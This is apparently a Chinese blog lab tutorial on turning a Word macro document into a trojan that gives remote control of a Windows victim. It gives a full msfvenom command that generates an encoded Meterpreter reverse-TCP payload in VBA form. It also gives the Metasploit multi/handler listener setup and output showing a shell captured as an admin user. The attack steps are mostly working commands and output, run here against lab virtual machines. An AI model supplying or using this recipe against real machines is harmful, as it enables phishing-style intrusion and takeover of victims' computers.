利用word漏洞制作Windows反弹木马

实验环境:Windows虚拟机一台IP地址为192.168.230.4,需安装office,kali Linux虚拟机一台,IP地址192.168.230.10
实验目的:拿下Windows控制权
实验步骤:
一,部署实验环境
1,Windows安装word,配置IP地址
在这里插入图片描述二,使用kali生成payload
1,打开msf生成payload
命令行输入msfconsole也可以打开
在这里插入图片描述

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.10 LPORT=4444 -a x86 --platform windows-e x86/shikata_ga_nai -i 5 -f vba-exe    生成payload,-p指定payload,LHOST指定本机IP地址作为监听,LPORT为本机监听端口,-a架构 x86架构,--platform平台为Windows,-e指定编码器

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述打开宏文件
在这里插入图片描述另存为反弹木马
在这里插入图片描述2,进行监听

msf6 > use exploit/multi/handler     
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   设置payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.230.10    设置监听IP地址
LHOST => 192.168.230.10
msf6 exploit(multi/handler) > set LPORT 4444     监听端口
LPORT => 4444
msf6 exploit(multi/handler) > run   运行监听器

在这里插入图片描述在这里插入图片描述在这里插入图片描述获取到shell
meterpreter > getuid 查看当前用户,已经获取到管理员权限
Server username: DESKTOP-QU8DCA3\admin
在这里插入图片描述
【至此,实验完成】

  • 0
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值